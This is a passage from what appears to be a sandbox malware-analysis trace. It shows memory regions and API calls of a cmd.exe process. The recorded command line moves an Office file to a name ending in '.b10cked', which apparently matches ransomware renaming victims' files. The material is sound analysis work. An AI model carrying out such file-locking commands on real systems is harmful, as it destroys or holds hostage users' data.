0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 21808 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 21809 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 21810 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 21811 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 21812 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 21813 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 21814 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 21815 start_va = 0x2a0000 end_va = 0x367fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 21816 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 21817 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 21818 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 21819 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 21820 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 21821 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 21822 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 21823 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 21824 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Thread: id = 328 os_tid = 0xe70 [0158.053] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efec4 | out: lpSystemTimeAsFileTime=0x1efec4*(dwLowDateTime=0x982521c0, dwHighDateTime=0x1d440a9)) [0158.053] GetCurrentProcessId () returned 0xe1c [0158.053] GetCurrentThreadId () returned 0xe70 [0158.053] GetTickCount () returned 0x30656 [0158.053] QueryPerformanceCounter (in: lpPerformanceCount=0x1efebc | out: lpPerformanceCount=0x1efebc*=21484268071) returned 1 [0158.054] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0158.054] __set_app_type (_Type=0x1) [0158.054] __p__fmode () returned 0x76b331f4 [0158.054] __p__commode () returned 0x76b331fc [0158.055] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0158.055] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0158.055] GetCurrentThreadId () returned 0xe70 [0158.055] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe70) returned 0x38 [0158.055] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0158.055] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0158.055] SetThreadUILanguage (LangId=0x0) returned 0x409 [0158.055] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0158.055] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efe54 | out: phkResult=0x1efe54*=0x0) returned 0x2 [0158.055] VirtualQuery (in: lpAddress=0x1efe8b, lpBuffer=0x1efe24, dwLength=0x1c | out: lpBuffer=0x1efe24*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0158.056] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efe24, dwLength=0x1c | out: lpBuffer=0x1efe24*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0158.056] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efe24, dwLength=0x1c | out: lpBuffer=0x1efe24*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0158.056] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efe24, dwLength=0x1c | out: lpBuffer=0x1efe24*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0158.056] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efe24, dwLength=0x1c | out: lpBuffer=0x1efe24*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0158.056] GetConsoleOutputCP () returned 0x1b5 [0158.056] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0158.056] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0158.056] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.056] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0158.056] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.056] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0158.057] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.057] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0158.057] _get_osfhandle (_FileHandle=0) returned 0x3 [0158.057] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0158.057] _get_osfhandle (_FileHandle=0) returned 0x3 [0158.057] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0158.057] GetEnvironmentStringsW () returned 0x3b0210* [0158.058] FreeEnvironmentStringsW (penv=0x3b0210) returned 1 [0158.058] GetEnvironmentStringsW () returned 0x3b0210* [0158.058] FreeEnvironmentStringsW (penv=0x3b0210) returned 1 [0158.058] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eedc4 | out: phkResult=0x1eedc4*=0x40) returned 0x0 [0158.058] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eedcc, lpData=0x1eedd0, lpcbData=0x1eedc8*=0x1000 | out: lpType=0x1eedcc*=0x0, lpData=0x1eedd0*=0xa0, lpcbData=0x1eedc8*=0x1000) returned 0x2 [0158.058] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eedcc, lpData=0x1eedd0, lpcbData=0x1eedc8*=0x1000 | out: lpType=0x1eedcc*=0x4, lpData=0x1eedd0*=0x1, lpcbData=0x1eedc8*=0x4) returned 0x0 [0158.058] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eedcc, lpData=0x1eedd0, lpcbData=0x1eedc8*=0x1000 | out: lpType=0x1eedcc*=0x0, lpData=0x1eedd0*=0x1, lpcbData=0x1eedc8*=0x1000) returned 0x2 [0158.058] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eedcc, lpData=0x1eedd0, lpcbData=0x1eedc8*=0x1000 | out: lpType=0x1eedcc*=0x4, lpData=0x1eedd0*=0x0, lpcbData=0x1eedc8*=0x4) returned 0x0 [0158.058] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eedcc, lpData=0x1eedd0, lpcbData=0x1eedc8*=0x1000 | out: lpType=0x1eedcc*=0x4, lpData=0x1eedd0*=0x40, lpcbData=0x1eedc8*=0x4) returned 0x0 [0158.058] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eedcc, lpData=0x1eedd0, lpcbData=0x1eedc8*=0x1000 | out: lpType=0x1eedcc*=0x4, lpData=0x1eedd0*=0x40, lpcbData=0x1eedc8*=0x4) returned 0x0 [0158.058] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eedcc, lpData=0x1eedd0, lpcbData=0x1eedc8*=0x1000 | out: lpType=0x1eedcc*=0x0, lpData=0x1eedd0*=0x40, lpcbData=0x1eedc8*=0x1000) returned 0x2 [0158.058] RegCloseKey (hKey=0x40) returned 0x0 [0158.058] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eedc4 | out: phkResult=0x1eedc4*=0x40) returned 0x0 [0158.059] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eedcc, lpData=0x1eedd0, lpcbData=0x1eedc8*=0x1000 | out: lpType=0x1eedcc*=0x0, lpData=0x1eedd0*=0x40, lpcbData=0x1eedc8*=0x1000) returned 0x2 [0158.059] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eedcc, lpData=0x1eedd0, lpcbData=0x1eedc8*=0x1000 | out: lpType=0x1eedcc*=0x4, lpData=0x1eedd0*=0x1, lpcbData=0x1eedc8*=0x4) returned 0x0 [0158.059] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eedcc, lpData=0x1eedd0, lpcbData=0x1eedc8*=0x1000 | out: lpType=0x1eedcc*=0x0, lpData=0x1eedd0*=0x1, lpcbData=0x1eedc8*=0x1000) returned 0x2 [0158.059] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eedcc, lpData=0x1eedd0, lpcbData=0x1eedc8*=0x1000 | out: lpType=0x1eedcc*=0x4, lpData=0x1eedd0*=0x0, lpcbData=0x1eedc8*=0x4) returned 0x0 [0158.059] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eedcc, lpData=0x1eedd0, lpcbData=0x1eedc8*=0x1000 | out: lpType=0x1eedcc*=0x4, lpData=0x1eedd0*=0x9, lpcbData=0x1eedc8*=0x4) returned 0x0 [0158.059] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eedcc, lpData=0x1eedd0, lpcbData=0x1eedc8*=0x1000 | out: lpType=0x1eedcc*=0x4, lpData=0x1eedd0*=0x9, lpcbData=0x1eedc8*=0x4) returned 0x0 [0158.059] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eedcc, lpData=0x1eedd0, lpcbData=0x1eedc8*=0x1000 | out: lpType=0x1eedcc*=0x0, lpData=0x1eedd0*=0x9, lpcbData=0x1eedc8*=0x1000) returned 0x2 [0158.059] RegCloseKey (hKey=0x40) returned 0x0 [0158.059] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886380 [0158.059] srand (_Seed=0x5b886380) [0158.059] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.DLL.trx_dll.b10cked\"" [0158.059] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.DLL.trx_dll.b10cked\"" [0158.059] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.060] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3b1970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0158.060] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0158.060] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0158.060] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0158.060] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0158.060] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0158.060] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0158.060] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0158.060] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0158.060] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0158.060] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0158.060] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0158.061] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0158.061] GetEnvironmentStringsW () returned 0x3b2360* [0158.061] FreeEnvironmentStringsW (penv=0x3b2360) returned 1 [0158.061] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0158.061] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0158.061] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0158.061] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0158.061] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0158.061] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0158.061] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0158.061] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0158.061] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0158.061] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0158.061] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1efb90 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.061] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1efb90, lpFilePart=0x1efb8c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1efb8c*="Desktop") returned 0x18 [0158.062] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0158.062] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef90c | out: lpFindFileData=0x1ef90c) returned 0x3b09f0 [0158.062] FindClose (in: hFindFile=0x3b09f0 | out: hFindFile=0x3b09f0) returned 1 [0158.062] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef90c | out: lpFindFileData=0x1ef90c) returned 0x3b09f0 [0158.062] FindClose (in: hFindFile=0x3b09f0 | out: hFindFile=0x3b09f0) returned 1 [0158.062] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef90c | out: lpFindFileData=0x1ef90c) returned 0x3b09f0 [0158.062] FindClose (in: hFindFile=0x3b09f0 | out: hFindFile=0x3b09f0) returned 1 [0158.063] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0158.063] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0158.063] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0158.063] GetEnvironmentStringsW () returned 0x3b0210* [0158.063] FreeEnvironmentStringsW (penv=0x3b0210) returned 1 [0158.063] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.064] GetConsoleOutputCP () returned 0x1b5 [0158.089] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0158.089] GetUserDefaultLCID () returned 0x409 [0158.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0158.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1efcd0, cchData=128 | out: lpLCData="0") returned 2 [0158.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1efcd0, cchData=128 | out: lpLCData="0") returned 2 [0158.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1efcd0, cchData=128 | out: lpLCData="1") returned 2 [0158.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0158.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0158.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0158.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0158.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0158.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0158.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0158.091] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0158.091] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0158.091] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0158.091] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0158.092] GetConsoleTitleW (in: lpConsoleTitle=0x3a0930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0158.092] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0158.092] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0158.093] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0158.093] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0158.093] _wcsicmp (_String1="move", _String2=")") returned 68 [0158.093] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0158.093] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0158.093] _wcsicmp (_String1="IF", _String2="move") returned -4 [0158.093] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0158.093] _wcsicmp (_String1="REM", _String2="move") returned 5 [0158.093] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0158.097] GetConsoleTitleW (in: lpConsoleTitle=0x1ef9c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0158.097] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0158.097] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0158.098] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0158.098] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0158.098] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0158.098] _wcsicmp (_String1="move", _String2="CD") returned 10 [0158.098] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0158.098] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0158.098] _wcsicmp (_String1="move", _String2="REN") returned -5 [0158.098] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0158.098] _wcsicmp (_String1="move", _String2="SET") returned -6 [0158.098] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0158.098] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0158.098] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0158.098] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0158.098] _wcsicmp (_String1="move", _String2="MD") returned 11 [0158.098] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0158.098] _wcsicmp (_String1="move", _String2="RD") returned -5 [0158.098] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0158.098] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0158.098] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0158.098] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0158.098] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0158.098] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0158.098] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0158.098] _wcsicmp (_String1="move", _String2="VER") returned -9 [0158.098] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0158.098] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0158.098] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0158.098] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0158.098] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0158.098] _wcsicmp (_String1="move", _String2="START") returned -6 [0158.098] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0158.098] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0158.099] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0158.100] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0158.100] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0158.101] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ef784, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1ef77c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ef77c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0158.101] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0158.101] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0158.101] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0158.101] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0158.101] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0158.101] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0158.101] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0158.101] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0158.101] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0158.101] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0158.101] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0158.101] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0158.101] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0158.101] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0158.101] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0158.101] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.101] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.102] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.102] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.102] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0158.102] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0158.102] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0158.102] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0158.102] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0158.102] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0158.102] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0158.102] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0158.102] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0158.102] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0158.102] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0158.102] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0158.102] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0158.102] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0158.102] _wcsicmp (_String1="PUB6IN~1.TRX", _String2=".") returned 66 [0158.103] _wcsicmp (_String1="PUB6IN~1.TRX", _String2="..") returned 66 [0158.103] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pub6in~1.trx")) returned 0x2020 [0158.103] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3b1f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.103] SetErrorMode (uMode=0x0) returned 0x0 [0158.103] SetErrorMode (uMode=0x1) returned 0x0 [0158.103] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~1.TRX", nBufferLength=0x104, lpBuffer=0x1ef10c, lpFilePart=0x1ef0f4 